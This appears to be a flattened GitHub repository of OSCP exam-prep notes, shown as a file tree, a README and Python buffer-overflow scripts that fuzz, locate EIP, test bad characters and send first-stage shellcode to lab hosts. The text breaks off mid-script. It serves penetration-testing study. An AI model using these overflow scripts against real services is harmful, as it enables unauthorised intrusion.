├── 1.lin-basic.md ├── 1.win-basic.md ├── 2.BOF.md ├── 3-Recon.md ├── 4-WebAttack.md ├── 5-ExploitShell.md ├── 6-WinPrivesc.md ├── 6-linuxPrivesc.md ├── 7-ActiveDirectory.md ├── 8-CrackCipher.md ├── 9-AntiVirusEvasion.md ├── 9-PTframework.md ├── 9-PostExploitaion.md ├── MyKaliForOSCP.md ├── OSCPtips.md ├── README.md ├── images └── bof │ ├── 060ac035-6ab6-4d6e-8f0b-99549dca62e0.png │ ├── 08addaa6-49f3-4898-8c5e-22c7797a5810.png │ ├── 2e6b97d1-7ffd-4665-bd04-632446068550.png │ ├── 50739600-cfae-499d-aeec-ced91cbca891.png │ ├── 7fb801b6-e3e4-424b-9a59-530bf86ee35b.png │ ├── 892451e7-258e-40e3-8653-c700bfc995bd.png │ ├── a542645d-4b3a-4911-9608-635153837857.png │ ├── a845958d-96c6-43f9-ba57-c731a0bf7611.jpg │ ├── b50a906b-9604-442a-b036-24c219b29e23.png │ └── b91150aa-bd45-4650-bf8b-f6edc9704215.png ├── scripts ├── lbof │ ├── 1linfuzz.py │ ├── 3linshell.py │ └── lin4badchar.py └── wbof │ ├── 1fuzz.py │ ├── 2bof.py │ ├── 2checkeip.py │ ├── 2findeip.py │ ├── 3getspace.py │ ├── 4checkbad.py │ ├── 5jmpesp.py │ ├── 7getshell.py │ ├── Asxtomp3converter.exe │ └── asxbof.md └── writeup └── htb ├── ad-active.md ├── ad-acute.md ├── ad-blackfield.md ├── ad-cascade.md ├── ad-forest.md ├── ad-fuse-undone.md ├── ad-mantis.md ├── ad-multimaster.md ├── ad-reel.md ├── ad-resolute.md ├── ad-sauna.md ├── ad-search.md ├── ad-sizzle.md ├── arctic.md ├── backdoor.md ├── bastard.md ├── bastion.md ├── beep.md ├── blocky.md ├── bounty.md ├── cronos.md ├── grandpa.md ├── grany.md ├── haircut.md ├── images ├── image-20220924003553547.png ├── image-20220924003920650.png ├── image-20220924003942131.png ├── image-20220924004055582.png ├── image-20220924004920191.png ├── image-20220924023328429.png ├── image-20220924023516374.png ├── image-20220924111610114.png ├── image-20220924111653452.png ├── image-20220924111756441.png ├── image-20220924112503991.png ├── image-20220924114822827.png ├── image-20220924114845109.png ├── image-20220924135551542.png ├── image-20220924135724419.png ├── image-20220924140110004.png ├── image-20220924145101016.png ├── image-20220924213022784.png ├── image-20220924213129196.png ├── image-20220924223318677.png ├── image-20220924225201545.png ├── image-20220924225331597.png ├── image-20220924230012511.png ├── image-20220924231918553.png ├── image-20220924232030678.png ├── image-20220924232434035.png ├── image-20220924232651719.png ├── image-20220924234431829.png ├── image-20220925000556434.png ├── image-20220925000738783.png ├── image-20220925001713245.png ├── image-20220925122346440.png ├── image-20220925122415939.png ├── image-20220925122505424.png ├── image-20220925165643194.png ├── image-20220925165712610.png ├── image-20220925170320556.png ├── image-20220925215526409.png ├── image-20220925220208294.png ├── image-20220926003233263.png ├── image-20220926004034922.png ├── image-20220926004334048.png ├── image-20220926004644915.png ├── image-20220926004703546.png ├── image-20220926005432012.png ├── image-20220927232024252.png ├── image-20220927232227146.png ├── image-20220927233915858.png ├── image-20220927234107335.png ├── image-20220927234151996.png ├── image-20220927234329126.png ├── image-20220927234636946.png ├── image-20220927235650352.png ├── image-20220928000500497.png ├── image-20220928000606055.png ├── image-20220928000723438.png ├── image-20220928000830592.png ├── image-20220928003412499.png ├── image-20220928005101978.png ├── image-20220928005220754.png ├── image-20220928005253261.png ├── image-20220928005605071.png ├── image-20220928005638543.png ├── image-20220930004615767.png ├── image-20220930012103214.png ├── image-20220930012523794.png ├── image-20220930012741671.png ├── image-20220930013024861.png ├── image-20220930013232266.png ├── image-20220930013325454.png ├── image-20220930013429452.png ├── image-20220930013715278.png ├── image-20221001162204947.png ├── image-20221001162411187.png ├── image-20221001162533764.png ├── image-20221001162609463.png ├── image-20221001165000389.png ├── image-20221001171550775.png ├── image-20221001171833590.png ├── image-20221001195523812.png ├── image-20221001195556861.png ├── image-20221002123015649.png ├── image-20221002123304850.png ├── image-20221002132028430.png ├── image-20221002132043574.png ├── image-20221002132119311.png ├── image-20221004195553761.png ├── image-20221004213727118.png ├── image-20221004214310633.png ├── image-20221006093554574.png ├── image-20221006093753452.png ├── image-20221006095034174.png ├── image-20221006095350557.png ├── image-20221006095600056.png ├── image-20221006100105020.png ├── image-20221006100317587.png ├── image-20221006100504905.png ├── image-20221006101936191.png ├── image-20221006102120562.png ├── image-20221006102236093.png ├── image-20221006104203078.png ├── image-20221006104229465.png ├── image-20221006110324775.png ├── image-20221006110357218.png ├── image-20221006110543293.png ├── image-20221006111742224.png ├── image-20221006111810718.png ├── image-20221006112008277.png ├── image-20221007171306603.png ├── image-20221007181533451.png ├── image-20221007182006959.png ├── image-20221007201117065.png ├── image-20221007201304220.png ├── image-20221007212736856.png ├── image-20221007213524443.png ├── image-20221007213614208.png ├── image-20221008002220140.png ├── image-20221008002602444.png ├── image-20221008002641117.png ├── image-20221008110922287.png ├── image-20221008112527576.png ├── image-20221008112655101.png ├── image-20221008112955288.png ├── image-20221012230724543.png ├── image-20221012231019955.png ├── image-20221012231232025.png ├── image-20221012231301508.png ├── image-20221012231553404.png ├── image-20221012231624888.png ├── image-20221012235108624.png ├── image-20221012235146971.png ├── image-20221013003445631.png ├── image-20221014204641857.png ├── image-20221014204820582.png ├── image-20221014204853312.png ├── image-20221014204933506.png ├── image-20221014205008635.png ├── image-20221014205330602.png ├── image-20221014205604726.png ├── image-20221014205657665.png ├── image-20221014205750324.png ├── image-20221014210220901.png ├── image-20221014210304608.png ├── image-20221014210354910.png ├── image-20221014212636936.png ├── image-20221014213254491.png ├── image-20221014232739154.png ├── image-20221014233140573.png ├── image-20221014233235151.png ├── image-20221014233328570.png ├── image-20221014233500066.png ├── image-20221015001336291.png ├── image-20221015003051835.png ├── image-20221015004124911.png ├── image-20221015004549489.png ├── image-20221015005808587.png ├── image-20221015020346788.png ├── image-20221015203052658.png ├── image-20221015203324402.png ├── image-20221015220218847.png ├── image-20221015220233157.png ├── image-20221015220314184.png ├── image-20221015220543473.png ├── image-20221015224440003.png ├── image-20221015224716688.png ├── image-20221015224917138.png ├── image-20221015224927312.png ├── image-20221016165913183.png ├── image-20221016212227916.png ├── image-20221016212607105.png ├── image-20221016212656112.png ├── image-20221016212756348.png ├── image-20221016212903401.png ├── image-20221016213009448.png ├── image-20221016213128514.png ├── image-20221016213155270.png ├── image-20221016213307543.png ├── image-20221016231751733.png ├── image-20221016232408996.png ├── image-20221019233349212.png ├── image-20221019233641637.png ├── image-20221020001715736.png ├── image-20221020232559806.png ├── image-20221020233246696.png ├── image-20221022192529141.png ├── image-20221022195149260.png ├── image-20221022211626522.png ├── image-20221022214822699.png ├── image-20221022215059624.png ├── image-20221022215706246.png ├── image-20221022220033432.png ├── image-20221023213218524.png ├── image-20221023213321474.png ├── image-20221023214425043.png ├── image-20221023214451200.png ├── image-20221023220607596.png ├── image-20221023220903026.png ├── image-20221023222050919.png ├── image-20221026102645013.png ├── image-20221026102740570.png ├── image-20221026104208164.png ├── image-20221026104731079.png ├── image-20221026112342335.png ├── image-20221026112352309.png ├── image-20221026113259137.png ├── image-20221026113315169.png ├── image-20221029162415893.png ├── image-20221029162802274.png ├── image-20221029234704932.png ├── image-20221029234839354.png ├── image-20221029235026968.png ├── image-20221030000055151.png ├── image-20221030000122307.png ├── image-20221030135016193.png ├── image-20221030145756089.png ├── image-20221030145827252.png ├── image-20221030150043257.png ├── image-20221030152347622.png ├── image-20221030153022130.png ├── image-20221030222755219.png ├── image-20221030224611029.png ├── image-20221030231830444.png ├── image-20221030231901698.png ├── image-20221030231933093.png ├── image-20221030231958267.png ├── image-20221030232836511.png ├── image-20221101222750743.png ├── image-20221102150553379.png ├── image-20221102150824792.png ├── image-20221102181423673.png ├── image-20221103142200083.png ├── image-20221103160625513.png ├── image-20221103192656734.png ├── image-20221103222137256.png ├── image-20221103222328205.png ├── image-20221103223202405.png ├── image-20221104174206387.png ├── image-20221105160904060.png ├── image-20221105161024761.png ├── image-20221105161332606.png ├── image-20221107232016785.png ├── image-20221107232245136.png ├── image-20221107232356016.png ├── image-20221107232645003.png ├── image-20221113230525991.png ├── image-20221114013406196.png ├── image-20221114224352632.png ├── image-20221117234112024.png ├── image-20221118000118552.png ├── image-20221119235835763.png ├── image-20221120000036912.png ├── image-20221120001002397.png ├── image-20221120181723981.png ├── image-20221120182156748.png ├── image-20221121130101314.png ├── image-20221121131555110.png ├── image-20221121131845625.png ├── image-20221121132151217.png ├── image-20221121132256126.png ├── image-20221121132527920.png ├── image-20221121224741518.png ├── image-20221203193519877.png ├── image-20221204000508554.png ├── image-20221204001746613.png ├── image-20221204005022847.png ├── image-20221204005959259.png ├── image-20221204143032712.png ├── image-20221204151422117.png ├── image-20221204151613080.png ├── image-20221204152258430.png ├── image-20221204160346658.png ├── image-20221204161402364.png ├── image-20221204161419478.png ├── image-20221204161656146.png ├── image-20221204202237848.png ├── image-20221204222846075.png ├── image-20221204224410764.png ├── image-20221204224502297.png ├── image-20221210153822720.png ├── image-20221211172535302.png ├── image-20221211174548056.png ├── image-20221211174828646.png ├── image-20221211175107117.png ├── image-20221211180250214.png ├── image-20221211180453371.png ├── image-20221211181806087.png ├── image-20221211215721891.png ├── image-20221211220746737.png ├── image-20221211222556421.png ├── image-20221211222934333.png ├── image-20221211223216266.png ├── image-20221212215552503.png ├── image-20221212215630948.png ├── image-20221212215740043.png ├── image-20221212220427820.png ├── image-20221212234746466.png ├── image-20221212234821129.png ├── image-20221212234958467.png ├── image-20221213000338744.png ├── image-20221213222443134.png ├── image-20221213232538919.png ├── image-20221213234723012.png ├── image-20221213234732346.png ├── image-20221214215056462.png ├── image-20221217132132421.png ├── image-20221217132146349.png ├── image-20221217132237171.png ├── image-20221217152615807.png ├── image-20221217183623913.png ├── image-20221217183708875.png ├── image-20221217194710260.png ├── image-20221217195936433.png ├── image-20221217201143838.png ├── image-20221217203017543.png ├── image-20221217204639782.png ├── image-20221217204750237.png ├── image-20221217204941487.png ├── image-20221217233026587.png ├── image-20221217233348166.png ├── image-20221217233407454.png ├── image-20221217233513787.png ├── image-20221218000413479.png ├── image-20221218001914482.png ├── image-20221218002102687.png ├── image-20221218002257117.png ├── image-20221218002529821.png ├── image-20221218002713803.png ├── image-20221218003936380.png ├── image-20221218004101982.png ├── image-20221218005051697.png ├── image-20221218005816443.png ├── image-20221218010135011.png ├── image-20221218010616203.png ├── image-20221218010704462.png ├── image-20221218011441551.png ├── image-20221218011511495.png ├── image-20221218013455692.png ├── image-20221218015119795.png ├── image-20221218015230358.png ├── image-20221218020332323.png ├── image-20221218020626320.png ├── image-20221218235308175.png ├── image-20221218235924771.png ├── image-20221219000007618.png ├── image-20221220185443194.png ├── image-20221220214501876.png ├── image-20221220214616026.png ├── image-20221221003949897.png ├── image-20221222010056608.png ├── image-20221222013543004.png ├── image-20221222075620527.png ├── image-20221224142534723.png ├── image-20221224153338063.png ├── image-20221224153350502.png ├── image-20221224153449875.png ├── image-20221225005712861.png ├── image-20221225012014922.png ├── image-20221225114018610.png ├── image-20221225141001716.png ├── image-20221225165920513.png ├── image-20221225213853706.png ├── image-20221225214200845.png ├── image-20221225222852128.png ├── image-20221225223120390.png ├── image-20221225223722876.png ├── image-20221225224911419.png ├── image-20221225225411688.png ├── image-20221225230315179.png ├── image-20221225232135606.png ├── image-20221225232318874.png ├── image-20221225233737188.png ├── image-20221226215718097.png ├── image-20221226220959511.png ├── image-20221227115516143.png ├── image-20221227140640517.png ├── image-20221230120329132.png ├── image-20221230163924357.png ├── image-20221230164033377.png ├── image-20221230164355050.png ├── image-20221230223413556.png ├── image-20221230223544586.png ├── image-20221230224359349.png ├── image-20221231181847992.png ├── image-20221231181923280.png ├── image-20221231181941276.png ├── image-20221231181957092.png ├── image-20221231182019393.png ├── image-20221231182312880.png ├── image-20221231192009774.png ├── image-20221231220249784.png ├── image-20221231224838236.png ├── image-20221231235035563.png ├── image-20230101001259320.png ├── image-20230102113250193.png ├── image-20230102173909090.png ├── image-20230102174047773.png ├── image-20230104210237774.png ├── image-20230104230329737.png ├── image-20230108121438918.png ├── image-20230108122014484.png ├── image-20230108122427516.png ├── image-20230108122652480.png ├── image-20230108122739342.png ├── image-20230108123148627.png ├── image-20230108123503157.png ├── image-20230108133806540.png ├── image-20230108133927982.png ├── image-20230108134045942.png ├── image-20230108141327838.png ├── image-20230108141359123.png ├── image-20230108141500217.png ├── image-20230108141552183.png ├── image-20230108142222299.png ├── image-20230108142332321.png ├── image-20230108145629319.png ├── image-20230109003307398.png ├── image-20230109205633588.png ├── image-20230111203620262.png ├── image-20230111235031104.png ├── image-20230113010029704.png ├── image-20230114181634168.png ├── image-20230114182213032.png ├── image-20230114182318507.png ├── image-20230115114612750.png ├── image-20230115114728175.png ├── image-20230115222124111.png ├── image-20230115234052808.png ├── image-20230119230529470.png ├── image-20230122121709541.png ├── image-20230122121835989.png ├── image-20230122121942401.png ├── image-20230124120247756.png ├── image-20230124120341960.png ├── image-20230124121515607.png └── image-20230124130830153.png ├── irked.md ├── jarvis.md ├── jeeves.md ├── love.md ├── mango.md ├── meta.md ├── mirai.md ├── networked.md ├── nibbles.md ├── nineveh.md ├── object.md ├── omni.md ├── pandora.md ├── paper.md ├── poison.md ├── popcorn.md ├── postman.md ├── remote.md ├── sense.md ├── setnotes.md ├── silo.md ├── sunday.md ├── support.md ├── swagshop.md ├── tartarsauce.md ├── template.md ├── valentine.md ├── worker.md └── writer.md /README.md: -------------------------------------------------------------------------------- 1 | # My-oscp-notes 2 | oscp notes and tips 3 | 4 | ## Content 5 | 6 | [My kali config for oscp(arm)](./MyKaliForOSCP.md) 7 | 8 | [OSCP tips](./OSCPtips.md) 9 | 10 | [lin-basic](./1.lin-basic.md) 11 | 12 | [win-basic](./1.win-basic.md) 13 | 14 | [BOF](./2.BOF.md) 15 | 16 | [Recon](./3-Recon.md) 17 | 18 | [WebAttack](./4-WebAttack.md) 19 | 20 | [ExploitShell](./5-ExploitShell.md) 21 | 22 | [WinPrivesc](./6-WinPrivesc.md) 23 | 24 | [linuxPrivesc](./6-linuxPrivesc.md) 25 | 26 | [ActiveDirectory](./7-ActiveDirectory.md) 27 | 28 | [CrackCipher](./8-CrackCipher.md) 29 | 30 | [AntiVirusEvasion](./9-AntiVirusEvasion.md) 31 | 32 | [PTframework](./9-PTframework.md) 33 | 34 | [PostExploitaion](./9-PostExploitaion.md) 35 | 36 | ***** 37 | 38 | ## 说明 39 | 1. 笔记为个人学习、认证过程中的记录,命令、说明来源于平时搜集学习的资料,使用前务必先验证,以免误导。 40 | 2. 笔记中部分技术点可能记录相关靶机,类似pg提示。 41 | 3. htb writeup 有些不太全,供参考。 42 | 4. tips 部分是他人的分享,部分是个人练习总结的经验。 43 | 44 | ****** 45 | 46 | **声明**:仅做技术分享与交流,他用后果自负。 47 | -------------------------------------------------------------------------------- /images/bof/060ac035-6ab6-4d6e-8f0b-99549dca62e0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/060ac035-6ab6-4d6e-8f0b-99549dca62e0.png -------------------------------------------------------------------------------- /images/bof/08addaa6-49f3-4898-8c5e-22c7797a5810.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/08addaa6-49f3-4898-8c5e-22c7797a5810.png -------------------------------------------------------------------------------- /images/bof/2e6b97d1-7ffd-4665-bd04-632446068550.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/2e6b97d1-7ffd-4665-bd04-632446068550.png -------------------------------------------------------------------------------- /images/bof/50739600-cfae-499d-aeec-ced91cbca891.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/50739600-cfae-499d-aeec-ced91cbca891.png -------------------------------------------------------------------------------- /images/bof/7fb801b6-e3e4-424b-9a59-530bf86ee35b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/7fb801b6-e3e4-424b-9a59-530bf86ee35b.png -------------------------------------------------------------------------------- /images/bof/892451e7-258e-40e3-8653-c700bfc995bd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/892451e7-258e-40e3-8653-c700bfc995bd.png -------------------------------------------------------------------------------- /images/bof/a542645d-4b3a-4911-9608-635153837857.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/a542645d-4b3a-4911-9608-635153837857.png -------------------------------------------------------------------------------- /images/bof/a845958d-96c6-43f9-ba57-c731a0bf7611.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/a845958d-96c6-43f9-ba57-c731a0bf7611.jpg -------------------------------------------------------------------------------- /images/bof/b50a906b-9604-442a-b036-24c219b29e23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/b50a906b-9604-442a-b036-24c219b29e23.png -------------------------------------------------------------------------------- /images/bof/b91150aa-bd45-4650-bf8b-f6edc9704215.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/images/bof/b91150aa-bd45-4650-bf8b-f6edc9704215.png -------------------------------------------------------------------------------- /scripts/lbof/1linfuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | host = "192.168.196.44" 4 | #crash = "\x41" * 4379 5 | crash = "" 6 | buffer = "\x11(setup sound " + crash + "\x90\x00#" 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | print "[*]Sending evil buffer..." 9 | s.connect((host, 13327)) 10 | print s.recv(1024) 11 | s.send(buffer) 12 | s.close() 13 | print "[*]Payload Sent !" -------------------------------------------------------------------------------- /scripts/lbof/3linshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | host = "192.168.196.44" 5 | padding = "\x41" * 4368 6 | eip = "\x42\x42\x42\x42" 7 | firststage = "\x83\xc0\x0c\xff\xe0\x90\x90" 8 | buffer = "\x11(setup sound " + padding + eip + firststage + "\x90\x00#" 9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | print "[*]Sending evil buffer..." 11 | s.connect((host, 13327)) 12 | print s.recv(1024) 13 | s.send(buffer) 14 | s.close() 15 | print "[*]Payload Sent !"' -------------------------------------------------------------------------------- /scripts/lbof/lin4badchar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | host = "192.168.196.44" 5 | badchars = ( 6 | b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x00" 7 | b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x10" 8 | b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x20" 9 | b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x30" 10 | b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x40" 11 | b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x50" 12 | b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x60" 13 | b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x70" 14 | b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x80" 15 | b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\x90" 16 | b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xa0" 17 | b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xb0" 18 | b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xc0" 19 | b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xd0" 20 | b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xe0" 21 | b"\xe1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf0") 22 | crash = badchars + "\x41" * (4368-len(badchars)) + "B" * 4 + "C" * 7 23 | buffer = "\x11(setup sound " + crash + "\x90\x00#" 24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | print "[*]Sending evil buffer..." 26 | s.connect((host, 13327)) 27 | print s.recv(1024) 28 | s.send(buffer) 29 | s.close() 30 | print "[*]Payload Sent !" 31 | -------------------------------------------------------------------------------- /scripts/wbof/1fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | size = 100 7 | while(size < 2000): 8 | try: 9 | print "\nSending evil buffer with %s bytes..." % size 10 | size = 100 11 | inputBuffer = "A" * size 12 | content = "username=" + inputBuffer + "&password=A" 13 | buffer = "POST /login HTTP/1.1\r\n" 14 | buffer += "Host: 192.168.196.10\r\n" 15 | buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 16 | buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 17 | buffer += "Accept-Language: en-US,en;q=0.5\r\n" 18 | buffer += "Referer: http://192.168.196.10/login\r\n" 19 | buffer += "Connection: close\r\n" 20 | buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 21 | buffer += "Content-Length: " + str(len(content)) + "\r\n" 22 | buffer += "\r\n" 23 | buffer += content 24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | s.connect(("192.168.196.10", 80)) 26 | s.send(buffer) 27 | s.close() 28 | size += 100 29 | time.sleep(10) 30 | except: 31 | print "Could not connect!" 32 | -------------------------------------------------------------------------------- /scripts/wbof/2bof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | size = 100 7 | try: 8 | print "\nSending evil buffer " 9 | size = 800 10 | inputBuffer = "A" * size 11 | content = "username=" + inputBuffer + "&password=A" 12 | buffer = "POST /login HTTP/1.1\r\n" 13 | buffer += "Host: 192.168.196.10\r\n" 14 | buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 15 | buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 16 | buffer += "Accept-Language: en-US,en;q=0.5\r\n" 17 | buffer += "Referer: http://192.168.196.10/login\r\n" 18 | buffer += "Connection: close\r\n" 19 | buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 20 | buffer += "Content-Length: " + str(len(content)) + "\r\n" 21 | buffer += "\r\n" 22 | buffer += content 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | s.connect(("192.168.196.10", 80)) 25 | s.send(buffer) 26 | s.close() 27 | print "\nDone!" 28 | except: 29 | print "Could not connect!" -------------------------------------------------------------------------------- /scripts/wbof/2checkeip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | size = 100 7 | try: 8 | print "\nSending evil buffer " 9 | filter = "A" * 780 10 | eip = "B" * 4 11 | buffer_end = "C" * 16 12 | inputBuffer = filter + eip + buffer_end 13 | content = "username=" + inputBuffer + "&password=A" 14 | sock_buffer = "POST /login HTTP/1.1\r\n" 15 | sock_buffer += "Host: 192.168.196.10\r\n" 16 | sock_buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 17 | sock_buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 18 | sock_buffer += "Accept-Language: en-US,en;q=0.5\r\n" 19 | sock_buffer += "Referer: http://192.168.196.10/login\r\n" 20 | sock_buffer += "Connection: close\r\n" 21 | sock_buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 22 | sock_buffer += "Content-Length: " + str(len(content)) + "\r\n" 23 | sock_buffer += "\r\n" 24 | sock_buffer += content 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | s.connect(("192.168.196.10", 80)) 27 | s.send(sock_buffer) 28 | s.close() 29 | print "\nDone!" 30 | except: 31 | print "Could not connect!" 32 | -------------------------------------------------------------------------------- /scripts/wbof/2findeip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | size = 100 7 | try: 8 | print "\nSending evil buffer " 9 | inputBuffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9" \ 10 | "Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9" \ 11 | "Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9" \ 12 | "Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9" \ 13 | "Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9" \ 14 | "Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9" \ 15 | "Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9" \ 16 | "Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9" \ 17 | "Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9" \ 18 | "Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" \ 19 | "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9" \ 20 | "Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9" \ 21 | "Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9" \ 22 | "An0An1An2An3An4An5An6An7An8An9" \ 23 | "Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9" \ 24 | "Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9" \ 25 | "Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9" \ 26 | "Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9" \ 27 | "As0As1As2As3As4As5As6As7As8As9" \ 28 | "At0At1At2At3At4At5At6At7At8At9" \ 29 | "Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9" \ 30 | "Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9" \ 31 | "Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9" \ 32 | "Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9" \ 33 | "Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9" \ 34 | "Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9" \ 35 | "Ba0Ba1Ba2Ba3Ba4Ba5Ba " 36 | content = "username=" + inputBuffer + "&password=A" 37 | buffer = "POST /login HTTP/1.1\r\n" 38 | buffer += "Host: 192.168.196.10\r\n" 39 | buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 40 | buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 41 | buffer += "Accept-Language: en-US,en;q=0.5\r\n" 42 | buffer += "Referer: http://192.168.196.10/login\r\n" 43 | buffer += "Connection: close\r\n" 44 | buffer += "Content-Type: application/x-www-form-urlencoded\r\n" 45 | buffer += "Content-Length: " + str(len(content)) + "\r\n" 46 | buffer += "\r\n" 47 | buffer += content 48 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | s.connect(("192.168.196.10", 80)) 50 | s.send(buffer) 51 | s.close() 52 | print "\nDone!" 53 | except: 54 | print "Could not connect!" 55 | -------------------------------------------------------------------------------- /scripts/wbof/3getspace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | size = 100 7 | try: 8 | print "\nSending evil buffer " 9 | filter = "A" * 780 10 | eip = "B" * 4 11 | offset = "C" * 4 12 | buffer_end = "D" * (1500 - len(filter) - len(eip) - len(offset)) 13 | inputBuffer = filter + eip + offset + buffer_end 14 | content = "username=" + inputBuffer + "&password=A" 15 | sock_buffer = "POST /login HTTP/1.1\r\n" 16 | sock_buffer += "Host: 192.168.196.10\r\n" 17 | sock_buffer += "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0\r\n" 18 | sock_buffer 